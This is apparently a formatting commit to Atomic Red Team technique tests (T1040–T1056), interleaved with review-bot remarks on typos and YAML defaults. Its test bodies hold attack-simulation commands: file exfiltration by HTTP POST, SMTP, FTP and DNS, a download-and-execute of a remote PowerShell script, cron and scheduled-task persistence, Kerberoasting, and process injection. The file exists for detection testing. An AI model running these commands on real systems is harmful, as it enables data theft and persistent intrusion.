@@ -323,20 +321,20 @@ atomic_tests: input_arguments: csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_linux_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -a -f -t 3 diff --git a/atomics/T1041/T1041.yaml b/atomics/T1041/T1041.yaml index 1b6a2fb3..33c97841 100644 --- a/atomics/T1041/T1041.yaml +++ b/atomics/T1041/T1041.yaml @@ -10,18 +10,18 @@ atomic_tests: input_arguments: destination_url: description: Destination URL to post encoded data. - type: String + type: string default: example.com filepath: description: The file which is being exfiltrated to the C2 Server. - type: Path + type: path default: $env:TEMP\LineNumbers.txt executor: command: | - if(-not (Test-Path #{filepath})){ - 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." } - } - [System.Net.ServicePointManager]::Expect100Continue = $false - $filecontent = Get-Content -Path #{filepath} - Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive + if(-not (Test-Path #{filepath})){ + 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." } + } + [System.Net.ServicePointManager]::Expect100Continue = $false + $filecontent = Get-Content -Path #{filepath} + Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive name: powershell 
diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml index 625031dc..ad6c95bd 100644 --- a/atomics/T1046/T1046.yaml +++ b/atomics/T1046/T1046.yaml @@ -13,7 +13,7 @@ atomic_tests: input_arguments: host: description: Host to scan. - type: String + type: string default: 192.168.1.1 executor: command: | @@ -31,15 +31,15 @@ atomic_tests: input_arguments: host: description: Host to scan. - type: String + type: string default: 192.168.1.1 port: description: Ports to scan. - type: String + type: string default: "80" network_range: description: Network Range to Scan. - type: String + type: string default: 192.168.1.0/24 dependency_executor_name: sh dependencies: @@ -76,11 +76,11 @@ atomic_tests: input_arguments: nmap_url: description: NMap installer download URL - type: Url + type: url default: https://nmap.org/dist/nmap-7.80-setup.exe host_to_scan: description: The host to scan with NMap - type: String + type: string default: 127.0.0.1 dependency_executor_name: powershell dependencies: @@ -104,20 +104,20 @@ atomic_tests: input_arguments: host_ip: description: Host to scan. - type: String + type: string default: 127.0.0.1 filename: description: Location of the project file - type: Path + type: path default: PathToAtomicsFolder\T1046\src\T1046.py dependency_executor_name: powershell dependencies: - - description: | - Check if python exists on the machine - prereq_command: | - if (python --version) {exit 0} else {exit 1} - get_prereq_command: | - echo "Python 3 must be installed manually" + - description: | + Check if python exists on the machine + prereq_command: | + if (python --version) {exit 0} else {exit 1} + get_prereq_command: | + echo "Python 3 must be installed manually" executor: command: | python #(unknown) -i #{host_ip} diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml index bc72a382..674f5001 100644 --- a/atomics/T1047/T1047.yaml +++ b/atomics/T1047/T1047.yaml 
@@ -47,11 +47,11 @@ atomic_tests:
 input_arguments:
 node:
 description: Ip Address
- type: String
+ type: string
 default: 127.0.0.1
 service_search_string:
 description: Name Of Service
- type: String
+ type: string
 default: Spooler
 executor:
 command: |
@@ -67,7 +67,7 @@ atomic_tests:
 input_arguments:
 process_to_execute:
 description: Name or path of process to execute.
- type: String
+ type: string
 default: notepad.exe
 executor:
 command: |
@@ -86,19 +86,19 @@ atomic_tests:
 input_arguments:
 node:
 description: Ip Address
- type: String
+ type: string
 default: 127.0.0.1
 user_name:
 description: Username
- type: String
+ type: string
 default: DOMAIN\Administrator
 password:
 description: Password
- type: String
+ type: string
 default: P@ssw0rd1
 process_to_execute:
 description: Name or path of process to execute.
- type: String
+ type: string
 default: notepad.exe
 executor:
 command: |
@@ -132,11 +132,11 @@ atomic_tests:
 input_arguments:
 new_class:
 description: Derived class name
- type: String
+ type: string
 default: Win32_Atomic
 process_to_execute:
 description: Name or path of process to execute.
- type: String
+ type: string
 default: notepad.exe
 executor:
 name: powershell
@@ -158,15 +158,15 @@ atomic_tests:
 input_arguments:
 node:
 description: Ip Address
- type: String
+ type: string
 default: 127.0.0.1
 dll_to_execute:
 description: Path to DLL.
- type: String
+ type: string
 default: $env:TEMP\calc.dll
 function_to_execute:
 description: Name of DLL function to call
- type: String
+ type: string
 default: StartW
 dependency_executor_name: powershell
 dependencies:
@@ -192,7 +192,7 @@ atomic_tests:
 default: 127.0.0.1
 product:
 description: Enter the product name being uninstalled. This will default to TightVNC.
- type: String
+ type: string
 default: Tightvnc
 dependency_executor_name: powershell
 dependencies:
diff --git a/atomics/T1048.002/T1048.002.yaml b/atomics/T1048.002/T1048.002.yaml
index aa0a8bc8..719338b8 100644
--- a/atomics/T1048.002/T1048.002.yaml
+++ b/atomics/T1048.002/T1048.002.yaml @@ -1,23 +1,23 @@ attack_technique: T1048.002 display_name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol atomic_tests: -- name: Exfiltrate data HTTPS using curl windows +- name: Exfiltrate data HTTPS using curl windows auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 description: | Exfiltrate data HTTPS using curl to file share site file.io supported_platforms: - - windows + - windows input_arguments: input_file: description: Test file to upload - type: Path + type: path default: PathToAtomicsFolder/T1048.002/src/artifact curl_path: description: path to curl.exe - type: Path + type: path default: C:\Windows\System32\Curl.exe - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | Curl must be installed on system. prereq_command: | @@ -45,12 +45,12 @@ atomic_tests: description: | Exfiltrate data HTTPS using curl to file share site file.io supported_platforms: - - macos - - linux + - macos + - linux input_arguments: input_file: description: Test file to upload - type: Path + type: path default: PathToAtomicsFolder/T1048.002/src/artifact executor: name: bash diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml index 5bc0d7b7..aea3ba2b 100644 --- a/atomics/T1048.003/T1048.003.yaml +++ b/atomics/T1048.003/T1048.003.yaml @@ -37,11 +37,11 @@ atomic_tests: input_arguments: input_file: description: Path to file to be exfiltrated. - type: Path + type: path default: C:\Windows\System32\notepad.exe ip_address: description: Destination IP address where the data should be sent. - type: String + type: string default: 127.0.0.1 executor: command: | 
@@ -64,57 +64,57 @@ atomic_tests: xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done 3. Once the data is received, use the below command to recover the data. - + cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r name: manual - name: Exfiltration Over Alternative Protocol - HTTP auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c description: | - Exfiltration of specified file over HTTP. - Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. + Exfiltration of specified file over HTTP. + Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. supported_platforms: - windows executor: command: | - $content = Get-Content #{input_file} - Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content + $content = Get-Content #{input_file} + Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content name: powershell input_arguments: input_file: description: Path to file to exfiltrate - type: Path + type: path default: C:\Windows\System32\notepad.exe ip_address: description: Destination IP address where the data should be sent - type: String + type: string default: http://127.0.0.1 - name: Exfiltration Over Alternative Protocol - SMTP auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9 description: | - Exfiltration of specified file over SMTP. - Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. + Exfiltration of specified file over SMTP. + Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. 
supported_platforms: - windows executor: command: | - Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} + Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} name: powershell input_arguments: input_file: description: Path to file to exfiltrate - type: Path + type: path default: C:\Windows\System32\notepad.exe sender: description: The email address of the sender - type: String + type: string default: "test@corp.com" receiver: description: The email address of the receiver - type: String + type: string default: "test@corp.com" smtp_server: description: SMTP server to use for email transportation - type: String + type: string default: "127.0.0.1" - name: MAZE FTP Upload auto_generated_guid: 57799bc2-ad1e-4130-a793-fb0c385130ba @@ -127,15 +127,15 @@ atomic_tests: input_arguments: ftp_server: description: FTP Server address - type: String + type: string default: 127.0.0.1 username: description: Username for FTP server login - type: String + type: string default: password: description: Password for FTP server login - type: String + type: string default: executor: command: | 
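Review bot: The re-indented SMTP description line still reads `to exfiltrateto a remote address`; since the line is rewritten by this commit anyway, `Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.` would fix the typo at no cost. In the HTTP test earlier in the same hunk, `ip_address` is described as a "Destination IP address" and retyped to `type: string`, yet its default is the URL `http://127.0.0.1` and it is passed to `Invoke-WebRequest -Uri`; the commit retypes comparable URL-valued arguments elsewhere (T1048 `domain`, T1046 `nmap_url`) as `type: url`, so `type: url` plus a description that says "URL" would be consistent. The test entries this hunk touches begin before its first line, so the `name:`/`auto_generated_guid:` context is not visible here.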
@@ -151,13 +151,13 @@ atomic_tests: else {echo "FTP Server Unreachable. Please verify the server address in input args and try again."} cleanup_command: | - $ftp = "ftp://#{ftp_server}/" - try {foreach ($file in (dir "$env:windir\temp" "*.7z")) - {$uri = New-Object System.Uri($ftp+$file.name) - $ftp_del = [System.Net.FtpWebRequest]::create($uri) - $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}') - $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile - $ftp_del.GetResponse()}} catch{} + $ftp = "ftp://#{ftp_server}/" + try {foreach ($file in (dir "$env:windir\temp" "*.7z")) + {$uri = New-Object System.Uri($ftp+$file.name) + $ftp_del = [System.Net.FtpWebRequest]::create($uri) + $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}') + $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile + $ftp_del.GetResponse()}} catch{} name: powershell - name: Exfiltration Over Alternative Protocol - FTP - Rclone auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b @@ -189,10 +189,10 @@ atomic_tests: Check if the exfil package exists prereq_command: | if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1} - get_prereq_command: | + get_prereq_command: | fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760 - description: 'Check if rclone zip exists' - prereq_command: | + prereq_command: | if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip" diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index 59b48d90..a282a43a 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml 
@@ -15,7 +15,7 @@ atomic_tests:
 input_arguments:
 domain:
 description: target SSH domain
- type: Url
+ type: url
 default: target.example.com
 executor:
 command: |
@@ -35,15 +35,15 @@ atomic_tests:
 input_arguments:
 user_name:
 description: username for domain
- type: String
+ type: string
 default: atomic
 password:
 description: password for user
- type: String
+ type: string
 default: atomic
 domain:
 description: target SSH domain
- type: Url
+ type: url
 default: target.example.com
 executor:
 command: |
@@ -60,28 +60,28 @@ atomic_tests:
 input_arguments:
 password:
 description: Password used to encrypt the data to be exfiltrated
- type: String
+ type: string
 default: atomic
 domain:
 description: The domain name to use for DNS requests
- type: String
+ type: string
 default: target.example.com
 ps_module:
 description: DNSExfiltrator powershell ps_module
- type: Path
+ type: path
 default: '$env:Temp\dnsexfil.ps1'
 doh:
 description: Google or CloudFlare DoH (DNS over HTTP) server
- type: String
+ type: string
 default: google
 time:
 description: The time in milliseconds to wait between each DNS request
- type: String
+ type: string
 default: 500
 encoding:
 description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers.
- type: String
- default: null
+ type: string
+ default:
 dependency_executor_name: powershell
 dependencies:
 - description: |
diff --git a/atomics/T1049/T1049.yaml b/atomics/T1049/T1049.yaml
index 1cfe553b..f1b647be 100644
--- a/atomics/T1049/T1049.yaml
+++ b/atomics/T1049/T1049.yaml
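Review bot: In the third hunk the `encoding` argument's `default: null` became a bare `default:` with no value; both load as null, but a key with nothing after it is the ambiguous form that YAML style guides warn against, and the explicit `null` at least recorded the intent. If the harness substitutes this value into the command, an empty string is probably what "no `-b32` flag" means, so `default: ''` would be the clearest choice; if a real null is required, keep `default: null` rather than the empty form. While here, the `time` argument is now declared `type: string` but its unquoted `default: 500` is loaded as an integer; `default: '500'` would match the declared type, though I cannot see from this hunk whether the executor cares about the distinction.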
@@ -57,34 +57,34 @@ atomic_tests: sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout. supported_platforms: - - windows + - windows input_arguments: SharpView_url: description: sharpview download URL - type: Url + type: url default: https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true SharpView: description: Path of the executable opensource redteam tool used for the performing this atomic. - type: Path + type: path default: PathToAtomicsFolder\T1049\bin\SharpView.exe syntax: - description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. - type: String - default: | + description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. + type: string + default: | "Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare" dependency_executor_name: powershell dependencies: - - description: | - Sharpview.exe must exist on disk at specified location (#{SharpView}) - prereq_command: | - if (Test-Path #{SharpView}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null - Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" + - description: | + Sharpview.exe must exist on disk at specified location (#{SharpView}) + prereq_command: | + if (Test-Path #{SharpView}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null + Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" executor: name: powershell elevation_required: true - command: | + command: | $syntaxList = #{syntax} foreach ($syntax in $syntaxList) { #{SharpView} $syntax -} 
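Review bot: The last line of this hunk renders as `-}`, which would remove the closing brace of `foreach ($syntax in $syntaxList) {` from the `command: |` block while the opening brace stays; if that is a real deletion the rendered PowerShell is syntactically incomplete and the executor will fail to parse it. The hunk's line counts (34 old, 34 new) fit a context line better than a removal, so this may be a rendering artifact of the page rather than the commit — please confirm against the new file. Also, the re-indented `description: Arguements method used along with SharpView …` keeps the misspelling; `description: Arguments method used along with SharpView …` would be a free fix on a line the commit already rewrites.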
diff --git a/atomics/T1053.002/T1053.002.yaml b/atomics/T1053.002/T1053.002.yaml index 61bc4385..fbe4b178 100644 --- a/atomics/T1053.002/T1053.002.yaml +++ b/atomics/T1053.002/T1053.002.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1053.002 display_name: 'Scheduled Task/Job: At' @@ -11,7 +10,7 @@ atomic_tests: Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. supported_platforms: - - windows + - windows executor: name: command_prompt elevation_required: false 
@@ -23,35 +22,35 @@ atomic_tests: This test submits a command to be run in the future by the `at` daemon. supported_platforms: - - linux + - linux input_arguments: time_spec: description: Time specification of when the command should run - type: String + type: string default: now + 1 minute at_command: description: The command to be run - type: String + type: string default: echo Hello from Atomic Red Team dependency_executor_name: sh dependencies: - - description: | - The `at` and `atd` executables must exist in the PATH - prereq_command: | - which at && which atd - get_prereq_command: | - echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)' - - description: | - The `atd` daemon must be running - prereq_command: | - systemctl status atd || service atd status - get_prereq_command: | - echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)' + - description: | + The `at` and `atd` executables must exist in the PATH + prereq_command: | + which at && which atd + get_prereq_command: | + echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)' + - description: | + The `atd` daemon must be running + prereq_command: | + systemctl status atd || service atd status + get_prereq_command: | + echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)' executor: name: sh elevation_required: false - command: | - echo "#{at_command}" | at #{time_spec} \ No newline at end of file + command: |- + echo "#{at_command}" | at #{time_spec} diff --git a/atomics/T1053.003/T1053.003.yaml b/atomics/T1053.003/T1053.003.yaml index 560097b8..4d7bf0ff 100644 --- a/atomics/T1053.003/T1053.003.yaml +++ b/atomics/T1053.003/T1053.003.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1053.003 display_name: 'Scheduled Task/Job: Cron' atomic_tests: 
@@ -7,16 +6,16 @@ atomic_tests: description: | This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. supported_platforms: - - macos - - linux + - macos + - linux input_arguments: command: description: Command to execute - type: String + type: string default: /tmp/evil.sh tmp_cron: description: Temporary reference file to hold evil cron schedule - type: Path + type: path default: /tmp/persistevil executor: name: bash @@ -30,16 +29,16 @@ atomic_tests: description: | This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. supported_platforms: - - macos - - linux + - macos + - linux input_arguments: command: description: Command to execute - type: String + type: string default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log cron_script_name: description: Name of file to store in cron folder - type: String + type: string default: persistevil executor: elevation_required: true @@ -59,15 +58,15 @@ atomic_tests: description: | This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. supported_platforms: - - linux + - linux input_arguments: command: description: Command to execute - type: String + type: string default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log cron_script_name: description: Name of file to store in /var/spool/cron/crontabs folder - type: String + type: string default: persistevil executor: elevation_required: true diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml index 6d38d5e1..25f8d975 100644 --- a/atomics/T1053.005/T1053.005.yaml +++ b/atomics/T1053.005/T1053.005.yaml 
@@ -1,4 +1,3 @@ ---- attack_technique: T1053.005 display_name: 'Scheduled Task/Job: Scheduled Task' atomic_tests: @@ -23,15 +22,15 @@ atomic_tests: description: | Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. supported_platforms: - - windows + - windows input_arguments: task_command: description: What you want to execute - type: String + type: string default: C:\windows\system32\cmd.exe time: description: What time 24 Hour - type: String + type: string default: "20:10" executor: name: command_prompt @@ -43,31 +42,30 @@ atomic_tests: - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | - Create a task on a remote system. - - Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. + Create a task on a remote system. + Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. supported_platforms: - - windows + - windows input_arguments: task_command: description: What you want to execute - type: String + type: string default: C:\windows\system32\cmd.exe time: description: What time 24 Hour - type: String + type: string default: "20:10" target: description: Target - type: String + type: string default: localhost user_name: description: 'Username to authenticate with, format: DOMAIN\User' - type: String + type: string default: DOMAIN\user password: description: Password to authenticate with - type: String + type: string default: At0micStrong executor: name: command_prompt @@ -83,7 +81,7 @@ atomic_tests: Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. supported_platforms: - - windows + - windows executor: name: powershell elevation_required: false 
@@ -106,7 +104,7 @@ atomic_tests:
 input_arguments:
 ms_product:
 description: Maldoc application Word
- type: String
+ type: string
 default: Word
 dependency_executor_name: powershell
 dependencies:
@@ -127,28 +125,28 @@ atomic_tests: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" name: powershell - cleanup_command : | + cleanup_command: | Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false - name: WMI Invoke-CimMethod Scheduled Task auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b description: | Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. supported_platforms: - - windows + - windows input_arguments: xml_path: description: path of vbs to use when creating masquerading files - type: Path + type: path default: PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml dependency_executor_name: powershell dependencies: - - description: | - File to copy must exist on disk at specified location (#{xml_path}) - prereq_command: | - if (Test-Path #{xml_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}" + - description: | + File to copy must exist on disk at specified location (#{xml_path}) + prereq_command: | + if (Test-Path #{xml_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}" executor: name: powershell elevation_required: true 
@@ -163,7 +161,7 @@ atomic_tests: A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created. The scheduled task will launch powershell to decode and run the command in the registry daily. This is a persistence mechanism recently seen in use by Qakbot. - + [Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/) supported_platforms: - windows 
@@ -180,27 +178,27 @@ atomic_tests: schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1 reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1 name: command_prompt -- name: Import XML Schedule Task with Hidden Attribute +- name: Import XML Schedule Task with Hidden Attribute auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4 description: | Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2. supported_platforms: - - windows + - windows input_arguments: xml_path: description: path of vbs to use when creating masquerading files - type: Path + type: path default: PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml dependency_executor_name: powershell dependencies: - - description: | - File to copy must exist on disk at specified location (#{xml_path}) - prereq_command: | - if (Test-Path #{xml_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}" + - description: | + File to copy must exist on disk at specified location (#{xml_path}) + prereq_command: | + if (Test-Path #{xml_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}" executor: name: powershell elevation_required: true 
@@ -217,7 +215,7 @@ atomic_tests: Upon successful execution, powershell.exe will create a scheduled task and modify the action. supported_platforms: - - windows + - windows executor: name: powershell elevation_required: false diff --git a/atomics/T1053.006/T1053.006.yaml b/atomics/T1053.006/T1053.006.yaml index 600d93f4..b0730724 100644 --- a/atomics/T1053.006/T1053.006.yaml +++ b/atomics/T1053.006/T1053.006.yaml @@ -7,23 +7,23 @@ atomic_tests: description: | This test creates Systemd service and timer then starts and enables the Systemd timer supported_platforms: - - linux + - linux input_arguments: path_to_systemd_service: description: Path to systemd service unit file - type: Path + type: path default: /etc/systemd/system/art-timer.service path_to_systemd_timer: description: Path to service timer file - type: Path + type: path default: /etc/systemd/system/art-timer.timer systemd_service_name: description: Name of systemd service - type: String + type: string default: art-timer.service systemd_timer_name: description: Name of systemd service timer - type: String + type: string default: art-timer.timer executor: command: | @@ -58,7 +58,7 @@ atomic_tests: description: | Schedule a user level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command. supported_platforms: - - linux + - linux dependency_executor_name: sh dependencies: - description: | @@ -68,7 +68,7 @@ atomic_tests: get_prereq_command: | echo "Install systemd on the machine."; exit 1; executor: - elevation_required: false + elevation_required: false command: | systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log' cleanup_command: | 
@@ -82,7 +82,7 @@ atomic_tests: description: | Schedule a system level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command. supported_platforms: - - linux + - linux dependency_executor_name: sh dependencies: - description: | @@ -92,7 +92,7 @@ atomic_tests: get_prereq_command: | echo "Install systemd on the machine."; exit 1; executor: - elevation_required: true + elevation_required: true command: | systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log' cleanup_command: | diff --git a/atomics/T1053.007/T1053.007.yaml b/atomics/T1053.007/T1053.007.yaml index a89c4f57..375882b3 100644 --- a/atomics/T1053.007/T1053.007.yaml +++ b/atomics/T1053.007/T1053.007.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: namespace: description: K8s namespace to list - type: String + type: string default: default dependencies: - description: | @@ -33,7 +33,7 @@ atomic_tests: input_arguments: namespace: description: K8s namespace to list - type: String + type: string default: default dependencies: - description: | diff --git a/atomics/T1055.001/T1055.001.yaml b/atomics/T1055.001/T1055.001.yaml index 8709825d..067f3b70 100644 --- a/atomics/T1055.001/T1055.001.yaml +++ b/atomics/T1055.001/T1055.001.yaml @@ -13,11 +13,11 @@ atomic_tests: input_arguments: process_id: description: PID of input_arguments - type: Integer + type: integer default: (Start-Process notepad -PassThru).id dll_payload: description: DLL to Inject - type: Path + type: path default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll dependency_executor_name: powershell dependencies: diff --git a/atomics/T1055.004/T1055.004.yaml b/atomics/T1055.004/T1055.004.yaml index 25dae388..01d95ed6 100644 --- a/atomics/T1055.004/T1055.004.yaml +++ b/atomics/T1055.004/T1055.004.yaml 
@@ -18,10 +18,10 @@ atomic_tests: input_arguments: exe_binary: description: Output Binary - type: Path + type: path default: PathToAtomicsFolder\T1055.004\bin\T1055.exe - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | #{exe_binary} must be exist on system. prereq_command: | @@ -33,4 +33,3 @@ atomic_tests: command: | #{exe_binary} name: command_prompt - diff --git a/atomics/T1055.012/T1055.012.yaml b/atomics/T1055.012/T1055.012.yaml index 6d3952d6..adfc231c 100644 --- a/atomics/T1055.012/T1055.012.yaml +++ b/atomics/T1055.012/T1055.012.yaml @@ -11,19 +11,19 @@ atomic_tests: input_arguments: hollow_binary_path: description: Path of the binary to hollow (executable that will run inside the sponsor) - type: String + type: string default: C:\Windows\System32\cmd.exe parent_process_name: description: Name of the parent process - type: String + type: string default: explorer sponsor_binary_path: description: Path of the sponsor binary (executable that will host the binary) - type: String + type: string default: C:\Windows\System32\notepad.exe spawnto_process_name: description: Name of the process to spawn - type: String + type: string default: notepad executor: command: | @@ -42,7 +42,7 @@ atomic_tests: input_arguments: ms_product: description: Maldoc application Word - type: String + type: string default: Word dependency_executor_name: powershell dependencies: diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index 0398c43f..dd5410ec 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -14,7 +14,7 @@ atomic_tests: input_arguments: txt_path: description: Path to file containing VBA macro to run - type: Path + type: path default: PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt dependency_executor_name: powershell dependencies: 
@@ -55,15 +55,15 @@ atomic_tests: input_arguments: machine: description: machine to target (via psexec) - type: String + type: string default: DC1 mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '%tmp%\mimikatz\x64\mimikatz.exe' psexec_path: description: Path to PsExec - type: String + type: string default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: @@ -97,7 +97,7 @@ atomic_tests: elevation_required: false # locally not, but remotely on target machine then yes - name: Section View Injection auto_generated_guid: c6952f41-6cf0-450a-b352-2ca8dae7c178 - description: | + description: | This test creates a section object in the local process followed by a local section view. The shellcode is copied into the local section view and a remote section view is created in the target process, pointing to the local section view. A thread is then created in the target process, using the remote section view as start address. diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index d7da9297..3730aa30 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -14,7 +14,7 @@ atomic_tests: input_arguments: filepath: description: Name of the local file, include path. - type: Path + type: path default: $env:TEMP\key.log dependencies: - description: | 
